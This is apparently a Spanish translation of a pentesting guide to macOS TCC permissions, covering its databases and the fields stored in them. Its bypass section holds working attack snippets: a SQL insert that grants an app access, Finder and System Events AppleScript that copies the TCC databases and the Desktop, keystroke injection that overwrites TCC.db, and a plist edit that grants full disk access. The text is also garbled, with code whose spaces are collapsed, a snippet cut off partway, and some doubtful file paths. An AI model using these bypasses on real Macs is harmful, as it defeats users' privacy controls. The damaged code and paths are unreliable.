TCC (Transparencia, Consentimiento y Control) es un protocolo de seguridad que se centra en regular los permisos de las aplicaciones. Su función principal es proteger características sensibles como servicios de ubicación, contactos, fotos, micrófono, cámara, accesibilidad y acceso completo al disco. Al exigir el consentimiento explícito del usuario antes de otorgar acceso a la aplicación a estos elementos, TCC mejora la privacidad y el control del usuario sobre sus datos.
Los usuarios se encuentran con TCC cuando las aplicaciones solicitan acceso a características protegidas. Esto es visible a través de un aviso que permite a los usuarios aprobar o denegar el acceso. Además, TCC acomoda acciones directas del usuario, como arrastrar y soltar archivos en una aplicación, para otorgar acceso a archivos específicos, asegurando que las aplicaciones solo tengan acceso a lo que se permite explícitamente.
TCC es manejado por el daemon ubicado en /System/Library/PrivateFrameworks/TCC.framework/Support/tccd y configurado en /System/Library/LaunchDaemons/com.apple.tccd.system.plist (registrando el servicio mach com.apple.tccd.system).
Hay un tccd en modo usuario que se ejecuta por cada usuario conectado definido en /System/Library/LaunchAgents/com.apple.tccd.plist registrando los servicios mach com.apple.tccd y com.apple.usernotifications.delegate.com.apple.tccd.
Aquí puedes ver el tccd ejecutándose como sistema y como usuario:
Los permisos son heredados de la aplicación padre y los permisos son seguros en función del Bundle ID y el Developer ID.
Bases de datos TCC
Las concesiones/denegaciones se almacenan en algunas bases de datos TCC:
La base de datos a nivel de sistema en /Library/Application Support/com.apple.TCC/TCC.db.
Esta base de datos está protegida por SIP, por lo que solo un bypass de SIP puede escribir en ella.
La base de datos TCC del usuario $HOME/Library/Application Support/com.apple.TCC/TCC.db para preferencias por usuario.
Esta base de datos está protegida, por lo que solo los procesos con altos privilegios TCC, como Acceso Completo al Disco, pueden escribir en ella (pero no está protegida por SIP).
Las bases de datos anteriores también están protegidas por TCC para acceso de lectura. Así que no podrás leer tu base de datos TCC de usuario regular a menos que sea desde un proceso privilegiado de TCC.
Sin embargo, recuerda que un proceso con estos altos privilegios (como FDA o kTCCServiceEndpointSecurityClient) podrá escribir en la base de datos TCC de los usuarios.
Hay una tercera base de datos TCC en /var/db/locationd/clients.plist para indicar los clientes permitidos para acceder a los servicios de ubicación.
El archivo protegido por SIP /Users/carlospolop/Downloads/REG.db (también protegido del acceso de lectura con TCC), contiene la ubicación de todas las bases de datos TCC válidas.
El archivo protegido por SIP /Users/carlospolop/Downloads/MDMOverrides.plist (también protegido del acceso de lectura con TCC), contiene más permisos otorgados por TCC.
El archivo protegido por SIP /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist (pero legible por cualquier persona) es una lista de aplicaciones que requieren una excepción de TCC.
La base de datos TCC en iOS está en /private/var/mobile/Library/TCC/TCC.db.
La interfaz del centro de notificaciones puede hacer cambios en la base de datos TCC del sistema:
Sin embargo, los usuarios pueden eliminar o consultar reglas con la utilidad de línea de comandos tccutil.
Consultar las bases de datos
sqlite3~/Library/Application\ Support/com.apple.TCC/TCC.dbsqlite> .schema# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id# The table access contains the permissions per servicessqlite> selectservice,client,auth_value,auth_reasonfromaccess;kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2kTCCServiceMicrophone|us.zoom.xos|2|2[...]# Check user approved permissions for telegramsqlite> select*fromaccesswhereclientLIKE"%telegram%"andauth_value=2;# Check user denied permissions for telegramsqlite> select*fromaccesswhereclientLIKE"%telegram%"andauth_value=0;
sqlite3/Library/Application\ Support/com.apple.TCC/TCC.dbsqlite> .schema# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id# The table access contains the permissions per servicessqlite> selectservice,client,auth_value,auth_reasonfromaccess;kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2kTCCServiceMicrophone|us.zoom.xos|2|2[...]# Get all FDAsqlite> selectservice,client,auth_value,auth_reasonfromaccesswhereservice="kTCCServiceSystemPolicyAllFiles"andauth_value=2;# Check user approved permissions for telegramsqlite> select*fromaccesswhereclientLIKE"%telegram%"andauth_value=2;# Check user denied permissions for telegramsqlite> select*fromaccesswhereclientLIKE"%telegram%"andauth_value=0;
Al verificar ambas bases de datos, puedes comprobar los permisos que una aplicación ha permitido, ha prohibido o no tiene (lo pedirá).
El service es la representación en cadena de la permisión TCC
El client es el ID de paquete o ruta al binario con los permisos
El client_type indica si es un Identificador de Paquete(0) o una ruta absoluta(1)
Cómo ejecutar si es una ruta absoluta
Simplemente haz launctl load you_bin.plist, con un plist como:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plistversion="1.0"><dict><!-- Label for the job --><key>Label</key><string>com.example.yourbinary</string><!-- The path to the executable --><key>Program</key><string>/path/to/binary</string><!-- Arguments to pass to the executable (if any) --><key>ProgramArguments</key><array><string>arg1</string><string>arg2</string></array><!-- Run at load --><key>RunAtLoad</key><true/><!-- Keep the job alive, restart if necessary --><key>KeepAlive</key><true/><!-- Standard output and error paths (optional) --><key>StandardOutPath</key><string>/tmp/YourBinary.stdout</string><key>StandardErrorPath</key><string>/tmp/YourBinary.stderr</string></dict></plist>
El auth_value puede tener diferentes valores: denied(0), unknown(1), allowed(2) o limited(3).
El auth_reason puede tomar los siguientes valores: Error(1), Consentimiento del Usuario(2), Establecido por el Usuario(3), Establecido por el Sistema(4), Política del Servicio(5), Política de MDM(6), Política de Anulación(7), Cadena de uso faltante(8), Tiempo de espera del aviso(9), Preflight Desconocido(10), Con derecho(11), Política de Tipo de Aplicación(12)
El campo csreq está ahí para indicar cómo verificar el binario a ejecutar y otorgar los permisos de TCC:
# Query to get cserq in printable hexselect service, client, hex(csreq) from access where auth_value=2;# To decode it (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):BLOB="FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003"echo"$BLOB"|xxd-r-p>terminal-csreq.bincsreq-r--t<terminal-csreq.bin# To create a new one (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):REQ_STR=$(codesign-d-r-/Applications/Utilities/Terminal.app/2>&1|awk-F' => ''/designated/{print $2}')echo"$REQ_STR"|csreq-r--b/tmp/csreq.binREQ_HEX=$(xxd-p/tmp/csreq.bin|tr-d'\n')echo"X'$REQ_HEX'"
También puedes verificar los permisos ya otorgados a las aplicaciones en Preferencias del Sistema --> Seguridad y Privacidad --> Privacidad --> Archivos y carpetas.
Los usuarios puedeneliminar o consultar reglas usando tccutil.
Restablecer permisos de TCC
# You can reset all the permissions given to an application withtccutilresetAllapp.some.id# Reset the permissions granted to all appstccutilresetAll
TCC Signature Checks
La base de datos de TCC almacena el ID de paquete de la aplicación, pero también almacenainformación sobre la firma para asegurarse de que la aplicación que solicita usar un permiso es la correcta.
# From sqlitesqlite> selectservice,client,hex(csreq) fromaccesswhereauth_value=2;#Get csreq# From bashecho FADE0C00000000CC000000010000000600000007000000060000000F0000000E000000000000000A2A864886F763640601090000000000000000000600000006000000060000000F0000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A364E33385657533542580000000000020000001572752E6B656570636F6465722E54656C656772616D000000 | xxd -r -p - > /tmp/telegram_csreq.bin
## Get signature checkscsreq-t-r/tmp/telegram_csreq.bin(anchorapplegenericandcertificateleaf[field.1.2.840.113635.100.6.1.9]/*exists*/oranchorapplegenericandcertificate1[field.1.2.840.113635.100.6.2.6]/*exists*/andcertificateleaf[field.1.2.840.113635.100.6.1.13]/*exists*/andcertificateleaf[subject.OU]="6N38VWS5BX") andidentifier"ru.keepcoder.Telegram"
Por lo tanto, otras aplicaciones que usen el mismo nombre y ID de paquete no podrán acceder a los permisos otorgados a otras aplicaciones.
Derechos y Permisos de TCC
Las aplicaciones no solo necesitansolicitar y haber recibido acceso a algunos recursos, también necesitan tener los derechos relevantes.
Por ejemplo, Telegram tiene el derecho com.apple.security.device.camera para solicitar acceso a la cámara. Una aplicación que no tenga este derecho no podrá acceder a la cámara (y el usuario ni siquiera será preguntado por los permisos).
Sin embargo, para que las aplicaciones accedan a ciertas carpetas de usuario, como ~/Desktop, ~/Downloads y ~/Documents, no necesitan tener ningún derecho específico. El sistema manejará el acceso de manera transparente y pedirá al usuario según sea necesario.
Las aplicaciones de Apple no generarán solicitudes. Contienen derechos preotorgados en su lista de derechos, lo que significa que nunca generarán un popup, ni aparecerán en ninguna de las bases de datos de TCC. Por ejemplo:
Esto evitará que Calendar pida al usuario acceder a recordatorios, calendario y la libreta de direcciones.
Aparte de alguna documentación oficial sobre derechos, también es posible encontrar información interesante no oficial sobre derechos enhttps://newosxbook.com/ent.jl
Algunos permisos de TCC son: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... No hay una lista pública que defina todos ellos, pero puedes consultar esta lista de los conocidos.
Lugares sensibles no protegidos
$HOME (en sí mismo)
$HOME/.ssh, $HOME/.aws, etc.
/tmp
Intención del usuario / com.apple.macl
Como se mencionó anteriormente, es posible otorgar acceso a una aplicación a un archivo arrastrándolo y soltándolo en ella. Este acceso no se especificará en ninguna base de datos de TCC, sino como un atributo extendido del archivo. Este atributo almacenará el UUID de la aplicación permitida:
xattrDesktop/private.txtcom.apple.macl# Check extra access to the file## Script from https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.commandmacl_readDesktop/private.txtFilename,Header,AppUUID"Desktop/private.txt",0300,769FD8F1-90E0-3206-808C-A8947BEBD6C3# Get the UUID of the appotool-l/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|grepuuiduuid769FD8F1-90E0-3206-808C-A8947BEBD6C3
Es curioso que el com.apple.macl atributo sea gestionado por el Sandbox, no por tccd.
También ten en cuenta que si mueves un archivo que permite el UUID de una aplicación en tu computadora a otra computadora, debido a que la misma aplicación tendrá diferentes UIDs, no se otorgará acceso a esa aplicación.
El atributo extendido com.apple.maclno se puede borrar como otros atributos extendidos porque está protegido por SIP. Sin embargo, como se explica en esta publicación, es posible desactivarlo comprimendo el archivo, eliminándolo y descomprimiéndolo.
TCC Privesc & Bypasses
Insertar en TCC
Si en algún momento logras obtener acceso de escritura sobre una base de datos de TCC, puedes usar algo como lo siguiente para agregar una entrada (elimina los comentarios):
Ejemplo de inserción en TCC
```sql INSERT INTO access ( service, client, client_type, auth_value, auth_reason, auth_version, csreq, policy_id, indirect_object_identifier_type, indirect_object_identifier, indirect_object_code_identity, flags, last_modified, pid, pid_version, boot_uuid, last_reminded ) VALUES ( 'kTCCServiceSystemPolicyDesktopFolder', -- service 'com.googlecode.iterm2', -- client 0, -- client_type (0 - bundle id) 2, -- auth_value (2 - allowed) 3, -- auth_reason (3 - "User Set") 1, -- auth_version (always 1) X'FADE0C00000000C40000000100000006000000060000000F0000000200000015636F6D2E676F6F676C65636F64652E697465726D32000000000000070000000E000000000000000A2A864886F7636406010900000000000000000006000000060000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A483756375859565137440000', -- csreq is a BLOB, set to NULL for now NULL, -- policy_id NULL, -- indirect_object_identifier_type 'UNUSED', -- indirect_object_identifier - default value NULL, -- indirect_object_code_identity 0, -- flags strftime('%s', 'now'), -- last_modified with default current timestamp NULL, -- assuming pid is an integer and optional NULL, -- assuming pid_version is an integer and optional 'UNUSED', -- default value for boot_uuid strftime('%s', 'now') -- last_reminded with default current timestamp ); ```
Cargas útiles de TCC
Si lograste entrar en una aplicación con algunos permisos de TCC, consulta la siguiente página con cargas útiles de TCC para abusar de ellas:
El nombre de TCC del permiso de Automatización es: kTCCServiceAppleEvents
Este permiso específico de TCC también indica la aplicación que puede ser gestionada dentro de la base de datos de TCC (por lo que los permisos no permiten solo gestionar todo).
Finder es una aplicación que siempre tiene FDA (incluso si no aparece en la interfaz de usuario), así que si tienes privilegios de Automatización sobre ella, puedes abusar de sus privilegios para hacer que realice algunas acciones.
En este caso, tu aplicación necesitaría el permiso kTCCServiceAppleEvents sobre com.apple.Finder.
# This AppleScript will copy the system TCC database into /tmposascript<<EODtellapplication"Finder"set homeFolder topath to home folder asstringset sourceFile to (homeFolder &"Library:Application Support:com.apple.TCC:TCC.db") asaliasset targetFolder toPOSIX file"/tmp"asaliasduplicatefile sourceFile to targetFolder with replacingend tellEOD
osascript<<EODtellapplication"Finder"set sourceFile toPOSIX file"/Library/Application Support/com.apple.TCC/TCC.db"asaliasset targetFolder toPOSIX file"/tmp"asaliasduplicatefile sourceFile to targetFolder with replacingend tellEOD
Podrías abusar de esto para escribir tu propia base de datos TCC de usuario.
Con este permiso podrás pedirle a Finder que acceda a carpetas restringidas por TCC y te dé los archivos, pero hasta donde sé, no podrás hacer que Finder ejecute código arbitrario para abusar completamente de su acceso FDA.
Por lo tanto, no podrás abusar de todas las habilidades de FDA.
Este es el aviso de TCC para obtener privilegios de Automatización sobre Finder:
Ten en cuenta que debido a que la aplicación Automator tiene el permiso TCC kTCCServiceAppleEvents, puede controlar cualquier aplicación, como Finder. Así que al tener el permiso para controlar Automator, también podrías controlar el Finder con un código como el que se muestra a continuación:
Obtener un shell dentro de Automator
```applescript osascript<
tell application "Automator" set actionID to Automator action id "com.apple.RunShellScript" tell (make new workflow) add actionID to it tell last Automator action set value of setting "inputMethod" to 1 set value of setting "COMMAND_STRING" to theScript end tell execute it end tell activate end tell EOD
Once inside the shell you can use the previous code to make Finder copy the TCC databases for example and not TCC prompt will appear
</details>
Lo mismo ocurre con la **aplicación Script Editor,** puede controlar Finder, pero usando un AppleScript no puedes forzarla a ejecutar un script.
### Automatización (SE) a algún TCC
**System Events puede crear Acciones de Carpeta, y las acciones de carpeta pueden acceder a algunas carpetas de TCC** (Escritorio, Documentos y Descargas), por lo que se puede usar un script como el siguiente para abusar de este comportamiento:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("cp -r $HOME/Desktop /tmp/desktop");
EOD
osacompile -l JavaScript -o "$HOME/Library/Scripts/Folder Action Scripts/script.scpt" "/tmp/script.js"
# Create folder action with System Events in "$HOME/Desktop"
osascript <<EOD
tell application "System Events"
-- Ensure Folder Actions are enabled
set folder actions enabled to true
-- Define the path to the folder and the script
set homeFolder to path to home folder as text
set folderPath to homeFolder & "Desktop"
set scriptPath to homeFolder & "Library:Scripts:Folder Action Scripts:script.scpt"
-- Create or get the Folder Action for the Desktop
if not (exists folder action folderPath) then
make new folder action at end of folder actions with properties {name:folderPath, path:folderPath}
end if
set myFolderAction to folder action folderPath
-- Attach the script to the Folder Action
if not (exists script scriptPath of myFolderAction) then
make new script at end of scripts of myFolderAction with properties {name:scriptPath, path:scriptPath}
end if
-- Enable the Folder Action and the script
enable myFolderAction
end tell
EOD
# File operations in the folder should trigger the Folder Action
touch "$HOME/Desktop/file"
rm "$HOME/Desktop/file"
Automatización (SE) + Accesibilidad (kTCCServicePostEvent|kTCCServiceAccessibility) para FDA*
La automatización en System Events + Accesibilidad (kTCCServicePostEvent) permite enviar pulsaciones de teclas a procesos. De esta manera, podrías abusar de Finder para cambiar el TCC.db de los usuarios o para otorgar FDA a una aplicación arbitraria (aunque se podría solicitar una contraseña para esto).
Ejemplo de Finder sobrescribiendo el TCC.db de los usuarios:
-- store the TCC.db file to copy in /tmposascript <<EOFtellapplication"System Events"-- Open Findertellapplication"Finder"toactivate-- Open the /tmp directorykeystroke"g" using {command down, shift down}delay1keystroke"/tmp"delay1keystroke returndelay1-- Select and copy the filekeystroke"TCC.db"delay1keystroke"c" using {command down}delay1-- Resolve $HOME environment variableset homePath tosystem attribute"HOME"-- Navigate to the Desktop directory under $HOMEkeystroke"g" using {command down, shift down}delay1keystroke homePath &"/Library/Application Support/com.apple.TCC"delay1keystroke returndelay1-- Check if the file exists in the destination and delete if it does (need to send keystorke code: https://macbiblioblog.blogspot.com/2014/12/key-codes-for-function-and-special-keys.html)keystroke"TCC.db"delay1keystroke returndelay1key code51 using {command down}delay1-- Paste the filekeystroke"v" using {command down}end tellEOF
Si tienes kTCCServiceEndpointSecurityClient, tienes FDA. Fin.
Archivo SysAdmin de Política del Sistema a FDA
kTCCServiceSystemPolicySysAdminFiles permite cambiar el atributo NFSHomeDirectory de un usuario que cambia su carpeta de inicio y, por lo tanto, permite eludir TCC.
Base de Datos TCC de Usuario a FDA
Obteniendo permisos de escritura sobre la base de datos TCC del usuario no **puedes** otorgarte permisos de FDA, solo el que vive en la base de datos del sistema puede otorgar eso.
Pero puedes dar a ti mismo derechos de Automatización al Finder, y abusar de la técnica anterior para escalar a FDA*.
Permisos de FDA a TCC
Acceso Completo al Disco es el nombre de TCC kTCCServiceSystemPolicyAllFiles
No creo que esto sea un verdadero privesc, pero por si acaso lo encuentras útil: Si controlas un programa con FDA puedes modificar la base de datos TCC de los usuarios y darte cualquier acceso. Esto puede ser útil como técnica de persistencia en caso de que pierdas tus permisos de FDA.
Bypass de SIP a Bypass de TCC
La base de datos TCC del sistema está protegida por SIP, por eso solo los procesos con los derechos indicados podrán modificarla. Por lo tanto, si un atacante encuentra un bypass de SIP sobre un archivo (poder modificar un archivo restringido por SIP), podrá:
Eliminar la protección de una base de datos TCC y otorgarse todos los permisos TCC. Podría abusar de cualquiera de estos archivos, por ejemplo:
La base de datos del sistema TCC
REG.db
MDMOverrides.plist
Sin embargo, hay otra opción para abusar de este bypass de SIP para eludir TCC, el archivo /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist es una lista de aplicaciones que requieren una excepción de TCC. Por lo tanto, si un atacante puede eliminar la protección SIP de este archivo y agregar su propia aplicación, la aplicación podrá eludir TCC.
Por ejemplo, para agregar terminal:
# Get needed infocodesign-d-r-/System/Applications/Utilities/Terminal.app
AllowApplicationsList.plist:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plistversion="1.0"><dict><key>Services</key><dict><key>SystemPolicyAllFiles</key><array><dict><key>CodeRequirement</key><string>identifier "com.apple.Terminal" and anchor apple</string><key>IdentifierType</key><string>bundleID</string><key>Identifier</key><string>com.apple.Terminal</string></dict></array></dict></dict></plist>